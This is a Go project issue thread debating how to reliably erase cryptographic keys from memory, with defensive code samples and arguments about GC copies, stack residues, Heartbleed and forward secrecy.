Final API is here: https://github.com/golang/go/issues/21865#issuecomment-925145234


Forward secrecy is usually only a thing if it's possible to ensure keys aren't actually in memory anymore. Other security properties, too, often require the secure erasure of keys from memory.

The typical way of doing this is through a function such as explicit_bzero, memzero_explicit, or the various other functions that C library writers provide that ensure an optimization-free routine for zeroing buffers.

For the most part, the same is possible in Go application code. However, it is not easily possible to do so with crypto API interfaces that internally manage a key buffer, such as the AEAD interface.
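In application code, a best-effort wipe might look like the following sketch (the `wipe` helper name is illustrative). Note Go offers no formal equivalent of explicit_bzero; runtime.KeepAlive merely discourages the compiler from treating the stores as dead:

```go
package main

import (
	"fmt"
	"runtime"
)

// wipe overwrites b with zeros. The runtime.KeepAlive call discourages
// dead-store elimination, but this is best-effort only: Go makes no
// guarantee comparable to explicit_bzero or memzero_explicit.
func wipe(b []byte) {
	for i := range b {
		b[i] = 0
	}
	runtime.KeepAlive(b)
}

func main() {
	secret := []byte("hunter2")
	wipe(secret)
	fmt.Println(secret) // [0 0 0 0 0 0 0]
}
```

This works only for buffers the application itself owns, which is exactly why internally managed key buffers are the sticking point.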

In the Go implementation of WireGuard, @rot256 has been forced to resort to unholy hacks such as:

import (
    "crypto/cipher"
    "reflect"
    "sync"

    "golang.org/x/crypto/chacha20poly1305"
)

type safeAEAD struct {
    mutex sync.RWMutex
    aead  cipher.AEAD
}

func (con *safeAEAD) clear() {
    con.mutex.Lock()
    if con.aead != nil {
        val := reflect.ValueOf(con.aead)
        elm := val.Elem()
        typ := elm.Type()
        elm.Set(reflect.Zero(typ))
        con.aead = nil
    }
    con.mutex.Unlock()
}

func (con *safeAEAD) setKey(key *[chacha20poly1305.KeySize]byte) {
    con.aead, _ = chacha20poly1305.New(key[:])
}

Having to resort to this kind of reflection is a bit unsettling and something we'd much rather not do.

So, this issue is to request and track the addition of a consistent "Clear()" interface for parts of the Go crypto API that store keys in internal buffers.


Furthermore, even if real clearing is deemed to be an abject failure due to Go's GC, and one must instead mmap/mlock or use a library such as memguard, the AEAD interface still is inadequate, because it appears that SetKey winds up allocating its own buffer internally. So again, big problem.

cc: @agl

Comment From: dsnet

Related to #21374

Comment From: anitgandhi

Just as another example of what was mentioned at the end: even creating an AES block primitive causes an allocation right before key expansion, which shows that wiping the original key is inadequate, including the way memguard does it.

https://github.com/golang/go/blob/master/src/crypto/aes/cipher.go#L46-L47

The key expansion is a deterministic process, so once c.enc and c.dec are set, an attacker who compromised the system such that memory could be scanned (even a system where memguard is used) could read the contents of c.enc or c.dec, reverse the key expansion process, and recover the original key. If I'm not mistaken, you could currently call aes.NewCipher(key) where key points to a memguard buffer, immediately wipe key, and then continue to use the instantiated cipher object for Encrypt and Decrypt calls, since from then on only the internally expanded key is required.

This comment explains that as well. Effectively, you'd have to create custom implementations of all the existing crypto code in the standard library and the supplementary x/crypto packages; even indirect dependencies like math/big would end up in scope.

In one sense, you'd have to replace make itself with manually managed memory, the way memguard does it, but that of course is a fundamental change to Go itself and would make the niceties of GC pointless.

Comment From: FiloSottile

This is going to be extremely hard to obtain as a generic guarantee, for all the reasons mentioned here, at #21374 and at awnumar/memguard#3. In particular there is no way to retroactively enforce that an interface implementation does not copy key material on the heap (at least outside of the stdlib, and we don't want a security guarantee that breaks when you use external implementations).

But how about a smaller problem:

  • add a Wipe() method to the implementation (say, chacha20poly1305); the method might or might not exist depending on the platform, since implementations can differ. The application can decide to warn or bail out if Wipe() is unavailable by doing an interface upgrade from AEAD, or refuse to compile at all by calling it directly on the concrete type
  • make an implementation with a Wipe() method guaranteed not to make copies of the key
  • if necessary, add a NewWithAllocator(makeSlice func(size int) []byte) function so that key material is placed in manually allocated memory exempt from GC and swapping (for example via memguard)
    • alternatively, unsafe can be used to instantiate the chacha20poly1305 object, but then you'd need an Init() method

Would that solve your problem enough?

Comment From: FiloSottile

Actually, forget Wipe(): it makes no sense if you have NewWithAllocator(makeSlice func(size int) []byte), since you can just use the allocator's wiping feature (which memguard offers). Moreover, if you have neither NewWithAllocator nor a #21374 solution, Wipe() is useless because of GC copies and swapping.

Comment From: yahesh

A possibility to reliably wipe secrets used by the crypto library would be highly appreciated. For example, gocryptfs has tried to solve this problem as far as is currently possible by wiping the memory locations it has access to.

However, as the crypto library creates copies of the encryption secrets by deriving encryption keys from the provided secrets, it's currently not possible to completely wipe said secrets (and derived keys) from memory.

Comment From: gopherbot

Change https://golang.org/cl/162297 mentions this issue: crypto/rc4: remove false guarantees from Reset docs and deprecate it

Comment From: gopherbot

Change https://golang.org/cl/163438 mentions this issue: [release-branch.go1.12] crypto/rc4: remove false guarantees from Reset docs and deprecate it

Comment From: zx2c4

Here's a somewhat different proposal that doesn't require adding anything to the language syntax itself and should deal with interesting behind-the-scenes copies:

runtime.SetZeroOnGC(obj)

In a similar way as SetFinalizer attaches a function to an object, SetZeroOnGC could mark that object's memory as needing to be zeroed whenever the runtime frees it or moves it to a new location. Over time this could also grow nice optimizations that aren't as easy with manual code; for example, if an object is being GC'd in order to serve an immediate allocation request with a default initial value, then the zeroing could be skipped.

CC @mknyszek @aclements

Comment From: awnumar

@zx2c4 interesting solution, but since the garbage collector isn't guaranteed to run this wouldn't really provide any reasonable guarantee of secrets being erased.

Comment From: zx2c4

@awnumar People who must have the memory zeroed now can of course call runtime.GC(). People with more relaxed requirements, "memory should get zeroed sometime in the future", can opt not to do that. Notably, that's the same semantic that people are used to having with SetFinalizer.

Comment From: awnumar

@zx2c4 I understand yet it seems like considerable extra architectural effort to add this functionality to the runtime without giving it more power in the form of some kind of security guarantees.

Comment From: zx2c4

Is this talk of "considerable extra architectural effort" true? I was hoping one of the garbage collector maintainers would chime in saying something like, "oh, that sounds very easy! we'll look into it." Maybe we can wait for them to weigh in on that first?

And "giving it more power in the form of ..." already evaluates to runtime.GC() as I already pointed out. So I'm not sure what you mean.

Comment From: awnumar

@zx2c4 Calling runtime.GC() when? Every so often? Or just before we exit? What if we terminate unexpectedly?

Having to deal with an additional function call to ensure some security property holds adds complexity to every code path, and dealing with it can be non-trivial.

Comment From: zx2c4

I guess it's up to the user and the use case. If the requirement is just that "at some point in the future, it's zeroed", then don't call runtime.GC(). If instead there are specific key erasure points, then call it then.

Comment From: awnumar

If the requirement is just that "at some point in the future, it's zeroed"...

Seems like a weak security requirement. I can't think of a use-case for it.

If a feature is going to be added to tackle the problem that this issue is about, it had better do it properly or not do it at all.

Comment From: zx2c4

Looks like you conveniently ignored the following sentence, which mentions the case of a different security requirement.

Comment From: yahesh

That's a strange way of looking at it. "Either we implement a perfect solution right away or we stay as insecure as we are at the moment!"

Comment From: randall77

Well, you can zero on GC right now with a finalizer:

type Secret struct {
    key [16]byte
}

s := &Secret{key: ...}
runtime.SetFinalizer(s, func(s *Secret) { s.key = [16]byte{} })

If/when Go has a copying GC*, then we would need to think about whether to zero the original copy of an object when it is moved. Maybe we just do that for every object. Maybe we recommend using the finalizer above, and only zero the original copy of things that have finalizers. (Kinda hacky overloading of semantics, but might work.)

I think this issue is asking for something more. In particular, Go exerts no control over what the OS does with heap-backed pages. It could write them to a swap file, for example. I think in general key management is going to require separate allocations for secrets anyway (specially mapped, on secure physical memory, etc.), so adding a mechanism for Go objects is only solving part of the key management problem.

*Go does have copying for stack-allocated objects. We don't currently zero the old copy of those objects. But you can force objects to be allocated off the stack by, for example, putting a finalizer on them.

Comment From: zx2c4

Well, you can zero on GC right now with a finalizer:

Right, sort of. My proposal is to add something that formalizes the possibility of that, via a specific call to runtime.SetZeroOnGC(obj).

Go exerts no control over what the OS does with heap-backed pages.

Having a specific marking means various facets of it can improve over time with future pull requests. For example, SetZeroOnGC could imply a call to mlock at some point, or whatever else is deemed necessary to make this fit the bill.

In other words, everyone agrees that proper zeroing in Go requires some cooperation from the runtime. Let's start that by adding a marking to the runtime.

Comment From: awnumar

Speaking from experience, the ability to provide a custom allocator to the runtime or within well-defined scopes, such as within a function or within a package, would be incredibly helpful. Currently in order to use secure APIs like crypto code requires manually rewriting parts of them to use specially allocated memory.

This is an evolving landscape and we're learning new things all the time about what works best and what does not. I don't personally see the value in a wrapper function for the finalizer: it brings no real new functionality to the table, and it gives the impression of greater security than it provides.

Comment From: zx2c4

Speaking from experience, the ability to provide a custom allocator to the runtime or within well-defined scopes

That sounds interesting. Maybe open a separate PR for that alongside some syntactical (Go 2) or function proposals?

Comment From: randall77

The problem I see with runtime.SetZeroOnGC is that it's too late. You really want to tell the runtime that this object is special at allocation time, not some time after the allocation has happened.

Maybe some reflect.New-style API in the crypto package.

Comment From: zx2c4

The problem I see with runtime.SetZeroOnGC is that it's too late. You really want to tell the runtime that this object is special at allocation time, not some time after the allocation has happened.

Why does it matter? If you are referencing the object, it's necessarily before it's been GC'd, and so there's a chance to call runtime.SetZeroOnGC. Of course it means that individual temporary or unexported buffers from various modules will over time need to be marked correctly, but that's fine and probably an evolutionary thing that can happen, mostly in crypto and x/crypto, I assume. If doing this in various places is deemed an unnecessary performance hit by those who don't want it, it's easy enough to make the whole thing opt-in, whereby SetZeroOnGC is globally a no-op until some other function is called or the like.

Comment From: randall77

If it is just SetZeroOnGC, then yes, you can do it after allocation. But for the larger key management problem, you want to tell the runtime "this contains a secret" at allocation time, so a special allocator of some sort can be used.

Comment From: zx2c4

Not sure I follow. For a "larger key management" situation, you call SetZeroOnGC on each piece of key material. If you're allocating it yourself, then you call it right after the new or make keyword. If you're getting it from somewhere else, then you call it when you get it.

It might be the case that you'd like to redirect allocations of an entire module to some totally separate allocator or something wild. That's fine and interesting, and I hope @awnumar will open an issue with a proposal for introducing that kind of multi-allocator machinery to Go. That seems like an interesting parallel effort that might benefit from being spec'd out.

My proposal here is to add a simple flag to the current allocator to solve this problem in a smaller and evolutionary way that can improve over time.

Comment From: randall77

It might be the case that you'd like to redirect allocations of an entire module to some totally separate allocator or something wild.

Maybe not an entire module, but the secret parts of it, yes.

I see SetZeroOnGC as only half a solution. Maybe it would help with simple security improvements, but anything really hardened will need a special allocator. There's no evolutionary path between the two (i.e. the implementation of SetZeroOnGC can't be upgraded to change where the allocation happens, because by the time you get to the call site, it is too late).

And we can do the simple security improvements that SetZeroOnGC can do today, with SetFinalizer.

Comment From: zx2c4

No, SetFinalizer is not sufficient, because of internal copies.

Comment From: randall77

What internal copies?

Comment From: FiloSottile

Over time I grew more and more skeptical about this.

Even if we went and tagged every single GC allocation that holds secrets or derivatives in all packages (which is a lot of pollution), the heap is only half the story. What about values on the stack? What about every single variable in a field implementation? Moreover, the boundary between stack and heap allocation is not specified in Go, so you'd have to tag everything to be safe.

That quickly devolves into a lot of complexity, for elusive gains, as you need all your dependencies to strictly apply tagging.

Are there no studies about this? I would want to see proof that languages which support this actually succeeded in developing an ecosystem that delivers actual security properties, before we embark on it. All I know about is from back when Heartbleed happened, and we found out that no, secrets were still all over memory.

Comment From: zx2c4

Indeed it's tough. For the kernel, I'm working on a gcc plugin that will zero out the stack frame of a function down to the depth of its deepest leaf, upon return from the marked top level parent.

But even without something like that in Go, I suspect the stack for my use cases will probably be clean of most intermediate values within a matter of minutes. Hours? Some interval? Importantly, not forever, or overly long.

Comment From: tv42

@randall77 I believe what was meant was internal copies that the Go GC might make in the future, or that the GC of another implementation might already make. There's never been a promise that the GC is not a moving GC. It'd be poor form to standardize an API that can't cope with that.

Comment From: ianlancetaylor

Presumably you know at allocation time that the value will hold something that should be scrubbed from memory. I think the only approach that is likely to work with the Go runtime is to use a separate allocator for those values, likely based directly on syscall.Mmap, and to implement the desired semantics directly. I think that writing a package that supports that would be more useful than trying to push the desired semantics into the Go runtime.
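A sketch of what such a package could look like on Linux, using only the syscall package (the secretBuf helper name is hypothetical; a production version would round to page size, add guard pages, and handle portability):

```go
package main

import (
	"fmt"
	"syscall"
)

// secretBuf allocates n bytes outside the Go heap via an anonymous mmap,
// locks the pages into RAM so they cannot be written to swap, and returns
// a free function that wipes the memory before unmapping it.
func secretBuf(n int) (buf []byte, free func(), err error) {
	b, err := syscall.Mmap(-1, 0, n,
		syscall.PROT_READ|syscall.PROT_WRITE,
		syscall.MAP_PRIVATE|syscall.MAP_ANON)
	if err != nil {
		return nil, nil, err
	}
	if err := syscall.Mlock(b); err != nil {
		syscall.Munmap(b)
		return nil, nil, err
	}
	free = func() {
		for i := range b {
			b[i] = 0 // wipe before returning the pages to the OS
		}
		syscall.Munlock(b)
		syscall.Munmap(b)
	}
	return b, free, nil
}

func main() {
	key, free, err := secretBuf(32)
	if err != nil {
		fmt.Println("mmap/mlock failed:", err)
		return
	}
	copy(key, "this memory is exempt from GC")
	fmt.Println(len(key))
	free()
}
```

Because the buffer never lives on the Go heap, the GC will neither move nor copy it, which is exactly the semantics the runtime cannot promise for ordinary allocations.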

Comment From: awnumar

@ianlancetaylor I think you're right but this leaves us with a choice:

  1. Rewrite libraries to use whatever custom data structure we end up with.
  2. Overload allocators in packages in some way. This way would make things easier but less flexible, as the allocators would need to return fixed data types or pointers since the packages have no "awareness" of the capabilities of the container objects.

Option one doesn't need the runtime to help it but option two probably would as I'm not sure if this can be accomplished with pure Go.

Comment From: zx2c4

Another way of doing this, perhaps, is to add a mark to functions, which would cause all allocations made from them or from their callees to be zeroed when GC'd or out of scope. This would help both with "stack zeroing" and with zeroing secrets that do explicitly escape, upon their GC pass. Implementation-wise, entry into these functions would flip a runtime switch to change allocator behavior/pool, as well as track the maximum stack depth for zeroing.

Comment From: CAFxX

Over time I grew more and more skeptical about this.

Even if we went and tagged every single GC allocation that holds secrets or derivatives in all packages (which is a lot of pollution), the heap is only half the story. What about values on the stack? What about every single variable in a field implementation? Moreover, the boundary between stack and heap allocation is not specified in Go, so you'd have to tag everything to be safe.

And that's before considering that the OS and the hypervisor likely make no guarantees that the contents of a virtual page will not be moved/copied to a different physical page, potentially leaving old copies of the contents of your pages lying around, outside of your control.

Comment From: magicalo

While a secure erase might be possible today via homebrewing, there should be a runtime mechanism for this instead of homebrew approaches built on runtime.KeepAlive or other hacks.

Otherwise everyone has to build their own solution to do what the runtime is best suited to handle. Moreover, private allocations inside libraries are not really reachable, so you can't reliably get at sensitive data that might be duplicated inside Go libraries like net/http.

Comment From: elagergren-spideroak

I'll add my two cents. To be clear, I'm not particularly for or against adding secure erasure. I would prefer to have a standardized API that's guaranteed to work across Go versions; that is, not DIYing it. But I also recognize that Go makes it difficult to really promise much.

Over time I grew more and more skeptical about this. Even if we went and tagged every single GC allocation that holds secrets or derivatives in all packages (which is a lot of pollution), the heap is only half the story. What about values on the stack? What about every single variable in a field implementation? Moreover, the boundary between stack and heap allocation is not specified in Go, so you'd have to tag everything to be safe.

And that's before considering that the OS and the hypervisor likely make no guarantees that the contents of a virtual page will not be moved/copied to a different physical page, potentially leaving old copies of the contents of your pages lying around, outside of your control.

While this is true, well-defined secure erase is useful for other reasons—like meeting certain regulations and standards. For example, NIAP requires one of the following for key destruction:

  1. single overwrite consisting of
    1.1. a pseudo-random pattern using the [CSPRNG]
    1.2. zeros
    1.3. ones
    1.4. new value of a key
  2. removal of power to the memory
  3. destruction of reference to the key directly followed by a request for garbage collection

Speaking generally, that the OS copies pages around or that the compiler promises nothing is largely irrelevant. What NIAP cares about is that the security goals are explicitly outlined and the application takes well-defined actions to meet those goals.

Returning to the list, while (2) is universal it can be unusable for obvious reasons. And while Go can reasonably implement (3), it's stymied by the fact that it can be easy to (accidentally) have multiple references to a piece of memory. Plus, it's difficult to implement as a "generic" function, so developers end up having to do it manually. Of the three options, (1) is the easiest to use correctly and consistently.

The for-range "zeroing" idiom (which I think has been brought up on this thread) with runtime.KeepAlive accomplishes (1), but it only works for pointers to types or types with internal pointers (like slices). And it relies on the pinky promise that runtime.KeepAlive will prevent the compiler from eliding the for-loop.
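Option (1) can be packaged as a small helper; this is a sketch (destroyKey is an illustrative name), and the runtime.KeepAlive call carries the same pinky promise just mentioned:

```go
package main

import (
	"crypto/rand"
	"fmt"
	"runtime"
)

// destroyKey implements NIAP option 1.1: a single overwrite with a
// pseudo-random pattern from the CSPRNG. If the CSPRNG fails, it falls
// back to zeros (option 1.2) so the destruction is unconditional.
func destroyKey(b []byte) {
	if _, err := rand.Read(b); err != nil {
		for i := range b {
			b[i] = 0
		}
	}
	runtime.KeepAlive(b) // best-effort guard against dead-store elimination
}

func main() {
	key := []byte("supersecretvalue")
	destroyKey(key)
	fmt.Println(len(key)) // length unchanged; contents overwritten
}
```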

The only other option is to use a C library, which isn't using Go at all!

I'm still not entirely sure I like this comparison, but to me asking users to manually securely wipe memory seems a bit like asking users to implement constant-time comparisons themselves. It can be a bit difficult to get correct, and then the developer has to ensure that their routines, which ostensibly rely on the compiler not optimizing them away, work across Go versions. Thus the stdlib's crypto/subtle package, which can be used even though other parts of the stdlib (like math/big) are not constant-time.

Comment From: magicalo

The way to do this is to have a secure slice type that is allocated on the heap in a page segmented from other allocations. It would be an explicit type, []sbyte. The Go runtime can ensure that this special type is properly managed on the heap and locked against the GC moving it. It would not be hard if one wanted to solve this problem in a serious way. The sbyte type could be zeroed explicitly by a call to runtime.SecureErase at any time of the developer's choosing, as well as automatically zeroed on GC.

Comment From: davecheney

syscall.Mmap seems to fit most of those requirements.

Comment From: elagergren-spideroak

@davecheney well, minus the secure erase bit.

@magicalo I do not think it's fair to say that it "would not be hard." There are a bunch of questions that need to be answered and thought through:

  1. What kind of type is []sbyte? Builtin? Named?
  2. Depending on (1), from which package will it be allocated?
  3. Is sbyte legal?
  4. Depending on the answer to (3), can sbyte be converted to byte or uint8? What about the other way around?
  5. Can []sbyte be used in APIs that require []byte? Otherwise, how can it be used with any existing APIs?
  6. If yes to (5), what happens if you, e.g., append []sbyte to []byte? Does it use the system allocator or Go's allocator?
  7. How does automatic GC work? The GC knows if a pointer is a valid Go heap or stack pointer, but how does it know that an arbitrary system pointer is []sbyte?
  8. Can this new allocator—whatever it is—reuse []sbytes once they've been garbage collected?

And so on.

Comment From: FiloSottile

Ignoring the specifics of the proposals in this issue for a moment, it seems to me that they can be grouped in three categories:

  1. mechanisms for wiping a memory region after using it (without getting optimized out by the compiler, and maybe doing it automatically like a finalizer)
  2. ways to tag an allocation as sensitive, so it is wiped when it goes out of scope, as well as when it's copied by stack moving or a future moving GC
  3. full taint analysis that tags any value derived from a sensitive value automatically, until it is marked clean.

I am 100% convinced (1) is insufficient and we should not pursue it, as it's guaranteed to leave behind copies on the stack.

I am very skeptical about the usability of (2), which is already available as Mmap or memguard (although those have a performance cost because they preclude stack allocations). It requires manually catching every secret-equivalent intermediate value and I don't think teams of human programmers over time are well-suited to that task, like they aren't well-suited to manually managing memory. Before we commit to adding support for something like that in the language and/or adopt it in the standard library, I'd want to see examples of it working successfully in end-to-end application scenarios (where a key is read from somewhere, decoded, passed around, and used for encryption). There is no point in making the cryptographic libraries "secure" if no application manages to use them securely.

(3) is hard and an open research topic. I would be interested in proposals or pointers to existing designs, but it's not something we can get done right away.

Comment From: magicalo

It is clear to me that everyone agrees this is needed. Let's start with that premise: 1) Is something needed? YES

How best to do it is certainly worth a discussion. In my mind, having a secure byte type, []sbyte, that has all of the same behaviors as a []byte type BUT is ensured to be allocated and destroyed in such a way that it can be securely managed/erased is the goal here. It clearly has broad appeal for any crypto implementation in Go and can be made to operate such that the average developer only needs to know when to use it. Put your secrets in an []sbyte only, don't copy them into other types, etc. The []sbyte type hides the hard parts from the average developer, and the runtime takes care of securely destroying the object when it goes out of scope.

Comment From: vparla

It is clear to me that everyone agrees this is needed. Let's start with that premise.

  1. Is something needed? YES

How best to do it is certainly worth a discussion. In my mind, having a secure byte type, []sbyte, that has all of the same behaviors as a []byte type BUT is ensured to be allocated and destroyed in such a way that it can be securely managed/erased is the goal here. It clearly has broad appeal for any crypto implementation in Go and can be made to operate such that the average developer only needs to know when to use it. Put your secrets in an []sbyte only, don't copy them into other types, etc. The []sbyte type hides the hard parts from the average developer, and the runtime takes care of securely destroying the object when it goes out of scope.

I agree this is worth exploring and is certainly valuable.

Comment From: tv42

@magicalo

In my mind, having a secure byte type, []sbyte, that has all of the same behaviors as a []byte type BUT is ensured to be allocated and destroyed in such a way that it can be securely managed/erased is the goal here.

If that type is magic, then that guarantee disappears immediately once you use any "normal" function that takes a []byte argument. Say, writing to a file. See "manually catching every secret-equivalent intermediate value" above.

Comment From: vparla

@tv42

If that type is magic, then that guarantee disappears immediately once you use any "normal" function that takes a []byte argument. Say, writing to a file. See "manually catching every secret-equivalent intermediate value" above.

Not if implemented correctly.
The point here is that there is a need for something to solve this problem.
There are many ways of solving it, even if not the one being suggested. Do you disagree with that?

Comment From: tv42

@vparla

Not if implemented correctly.

Which is point 3 in https://github.com/golang/go/issues/21865#issuecomment-771559897 and goes well beyond "duh just add a type".

Comment From: FiloSottile

The most constructive way to make progress now would be to present proposals (ideally as separate issues) that address the points listed in https://github.com/golang/go/issues/21865#issuecomment-771559897.

A type derived from []byte is in the (2) category: it does not solve tracking intermediate values, and does not support any non-[]byte representations of secrets. (For example, the integers used internally in most cryptographic implementations.)

Simply because there is a need, it doesn't mean there is a solution, or that we should adopt any incomplete solution that we don't expect will actually fix the problem.

Comment From: vparla

@vparla

Not if implemented correctly.

Which is point 3 in #21865 (comment) and goes well beyond "duh just add a type".

I don't think anyone was saying "duh just add a type", and I'm not sure what value that comment brings to the conversation. Either way, I think there is usefulness in building this functionality into the runtime.
If it is too hard to do, then maybe the solution/system is not appropriate for these types of secure use cases and another technology should be used instead.

Comment From: rsc

Marked as proposal and adding to the minutes. But https://github.com/golang/go/issues/21865#issuecomment-771559897 seems like a clear reason this can't be accepted: what we know how to do isn't enough, and what's enough is impossible / impractical / we don't know how to do it.

Comment From: magicalo

Marked as proposal and adding to the minutes. But #21865 (comment) seems like a clear reason this can't be accepted: what we know how to do isn't enough, and what's enough is impossible / impractical / we don't know how to do it.

Not sure how to unpack this. We will consider it, but it is too hard so we won't do it? If that is the case then a disclaimer should be written that this technology is inherently insecure and cannot be made secure.

Comment From: rsc

This proposal has been added to the active column of the proposals project and will now be reviewed at the weekly proposal review meetings. — rsc for the proposal review group

Comment From: ianlancetaylor

@magicalo We would like to do it if we can, but, as far as we know, it is impossible.

I don't see that this implies that the technology is inherently insecure. Security must always be defined in terms of some sort of attacker. Key erasure is presumably intended to protect against an attacker who has the ability to read arbitrary memory in your process. I agree that securing a Go program against that level of attack is quite difficult. The same is true of many other languages.

Comment From: magicalo

So the statement you are making is that Go is inherently insecure and as such should not be used for servers that access sensitive data. Heartbleed is a great example of why sensitive data should not be left in memory any longer than actually needed. It is one of many examples that include other techniques such as memory dump analysis, etc.

Comment From: ianlancetaylor

I agree that long-running servers written in Go should not store sensitive data as Go values in process memory. And I claim that the same is true for many other languages. Even in C you have to think about kernel network buffers and kernel swap space. (And the mechanisms that C programs use to avoid those problems can also work for Go programs.)

That is not the same as saying that Go is inherently insecure.

Comment From: FiloSottile

Heartbleed is an excellent example of how this is an unsolved problem. OpenSSL always attempted to do secret clearing with mechanisms similar to the ones proposed here, and some providers even went further and used custom allocation arenas for secret values. They were all compromised by Heartbleed anyway, because there were always intermediate values scattered in memory from which to reconstruct the secrets.

Comment From: magicalo

Heartbleed recovered private data that was not within OpenSSL. So this is a total mischaracterization of the exploit and the problem space.

Comment From: FiloSottile

See https://blogs.akamai.com/2014/04/heartbleed-update.html and the following updates.

Comment From: magicalo

The VULNERABILITY was in OpenSSL's heartbeat mechanism. The memory recovered off the devices was arbitrary memory, not limited to OpenSSL's own allocations, and it often contained keys and other sensitive data. This arbitrary memory often had data in it from earlier, completely unrelated to the active session, that was not zeroed before being returned to the allocator.

Comment From: tv42

This arbitrary memory often had data in it from earlier, completely unrelated to the active session, that was not zeroed before being returned to the allocator.

So, what FiloSottile said -- the key erasure mechanism they had wasn't comprehensive enough.

Comment From: magicalo

Who is 'they'? The memory accessed was not OpenSSL memory. It was random memory on the system, reachable due to an OpenSSL bug.
This could include any number of underlying server technologies such as Java, C, PHP, whatever. No doubt mostly Java-based at the time.

The fact that implementers were not good security practitioners is unremarkable, and it is another problem entirely. Let's not conflate the two.

The lack of an ecosystem is the problem here and all the more reason to have a nice built-in type designated for handling sensitive data so that your average developer doesn't have to think about it. Make it simple and secure and just tell the developer to use the sbyte type for sensitive data.

Comment From: ianlancetaylor

But the secret data arrives from somewhere, and it lives in memory while it is arriving, in kernel network buffers or kernel file buffers if nowhere else. Or, the secret data is sent somewhere, and it lives in memory while it is being sent. And that memory is not controlled by Go. I don't understand how a Go sbyte type will avoid those vulnerabilities.

Comment From: zx2c4

Often times, secret data comes from /dev/urandom, for the purpose of doing ephemeral DH. In this case, the read syscall or the getrandom syscall presumably take pains to ensure these bytes are overwritten. Grep the kernel for memzero_explicit to see. Last line of this function, for example: https://github.com/torvalds/linux/blob/f40ddce88593482919761f74910f42f4b84c004b/drivers/char/random.c#L1066

Comment From: antichris

There is truth on both sides of the discussion.

It's certainly true that a perfect implementation may very well be impractical or even technically impossible, as @FiloSottile and others on the Go team are warning. But it is also true that there are steps that can be taken to reduce the risk of sensitive material exposure, a reduction that may turn out to be significant or even sufficient for most if not all practical purposes, as @magicalo is arguing.

I think it all comes down to damage control, to reducing the risk, even if total elimination is infeasible. I may be wrong, though; maybe it really makes more sense to do nothing at all. I'm willing to be swayed.

Comment From: FiloSottile

Security nihilism is definitely a trap to keep in mind, and we shouldn't give up on security as a whole simply because it's not possible to achieve perfect security, that is all true. However, that concept is much more useful when applied along the attacker class axis: it's fine to deploy protections that defend against some attackers but not others.

Here, it's not at all clear what attacker would be able to read process memory but would be stopped by the fact that some of the copies of a secret were deleted. In what scenario do the partial solutions actually stop a compromise from happening? All partial solutions (like the Akamai allocation arena that was supposed to protect OpenSSL secrets) turned out to be useless when Heartbleed happened.

It's not security nihilism to refuse to implement a measure that doesn't stop any real world attacker. In fact, it would be reckless to state that we provide a security property that we don't believe is actually available.

Another axis is application class: in https://github.com/golang/go/issues/21865#issuecomment-771559897 I didn't rule out (2) entirely, I asked to be pointed to examples of real applications that were made actually secure against realistic attackers by using a limited technique like memguard. I suspect they don't exist, but I am willing to be proven wrong! memguard is available right now, it's a little inconvenient to use, but it should be more than possible to use it like a secure []byte to show it would be useful.

Comment From: magicalo

I don't think one can in good conscience recommend Go in any software that handles sensitive data at this time.
I think a disclaimer or warning to this effect should be clearly stated on the Go doc pages.

Comment From: 0xmichalis

I don't think one can in good conscience recommend Go in any software that handles sensitive data at this time. I think a disclaimer or warning to this effect should be clearly stated on the Go doc pages.

Can you recommend a language to do what you are after?

Comment From: magicalo

I don't think one can in good conscience recommend Go in any software that handles sensitive data at this time. I think a disclaimer or warning to this effect should be clearly stated on the Go doc pages.

Can you recommend a language to do what you are after?

In C/C++ it is possible to do this today, and there are libraries that provide this capability, including secure enclave libraries.

Comment From: ianlancetaylor

How do C/C++ programs let you clear the contents of the secret data out of kernel file buffers or network buffers?

Comment From: zx2c4

When you generate random numbers, the kernel memzeros its temporary buffer after calling copy_to_user on it, and it also ratchets the RNG to prevent backtracking. This makes it possible to do forward secure ephemeral diffie-hellman in userspace, from a C or C++ or Rust or whatever program.

Usually you don't want those ephemeral keys copied to disk (it's hard to erase SSDs) or sent out over the network (they're private keys, after all).

Comment From: ianlancetaylor

Thanks, but that seems like a special case. Perhaps I am mistaken.

@odeke-em just pointed me at https://medium.com/edgelesssystems/ego-effortlessly-build-confidential-apps-in-go-dc2b1460e1bf. I don't know enough to judge how useful that is.

Comment From: zx2c4

Thanks, but that seems like a special case. Perhaps I am mistaken.

Sorry, but you are very mistaken. Forward secrecy is one of the primary security properties that you want from a cryptographic protocol. One of the oldest and most common ways of doing this is diffie-hellman with ephemerally generated keys. There is no shortage of popular protocols on the internet that make use of this -- TLS, SSH, Signal, WireGuard, .... In order for that property of forward secrecy to actually exist, you have to make sure old ephemeral private keys aren't sitting around in memory for some future attacker to dump. That means being able to effectively zero out the key in memory. With Go, this is currently not possible. That's a big problem.

Comment From: ianlancetaylor

I'm sorry, I don't understand. I asked about kernel network buffers. If you are using TLS, SSH, etc., then the data is going to live in kernel network buffers. You replied explaining that the RNG was cleared. That's great. But if the data also lives in network buffers, how are those cleared?

Comment From: FiloSottile

Jason is talking about the ephemeral keys that allow decryption of connection recordings. The plaintext eventually will mostly get overwritten by simple memory pressure, but if the keys are still around the recording can be decrypted. To be clear, I agree that guaranteed wiping of ephemeral DH values is desirable. I am sort of skeptical the kernel actually pulls it off for the random subsystem, but if we had a way to do our part we should.

The point is that there isn't a reliable way to do this, in Go and in all other languages. It's not just the [16]byte that needs wiping: it's the stacks of all the ECDHE functions, the memory that held the derived symmetric key for the duration of the connection, the stacks of all the AEAD functions, the registers used for hardware-accelerated cryptography...

If one thinks that C/C++ make it possible, they can reach for memguard and do the exact same thing in Go. I don't believe it's sufficient at scale, and I don't know of better solutions.

Comment From: zx2c4

I'm sorry, I don't understand. I asked about kernel network buffers. If you are using TLS, SSH, etc., then the data is going to live in kernel network buffers. You replied explaining that the RNG was cleared. That's great. But if the data also lives in network buffers, how are those cleared?

The information that you transmit and receive in network buffers is encrypted information. How do you decrypt it? By having the key that was used to encrypt it. How is this key derived?

In protocols without forward secrecy it's derived from some long-term private key(s), usually living on disk somewhere. That means if you compromise that long-term private key at some point in the future -- say by hacking into a computer, or poking at memory from a hypervisor -- you can go back in time and decrypt all of the traffic you recorded during the two years prior.

So it's not good to use protocols without forward secrecy. By contrast, protocols with forward secrecy mix in short-term ephemeral keys alongside those long-term private key(s). These are generated per-session, or per-time-interval, or sometimes per-message, using random bytes from the system RNG. They never hit disk, they are never transmitted raw, and they're always zeroed out of memory after use. This way, an attacker who compromises your box can't decrypt more than the current session in memory. All the others have been erased.

More concretely, WireGuard generates a new ephemeral key every 2 minutes. If an attacker compromises your box, he shouldn't be able to decrypt more than the last few minutes of encrypted traffic. However, with Go, that guarantee no longer holds.
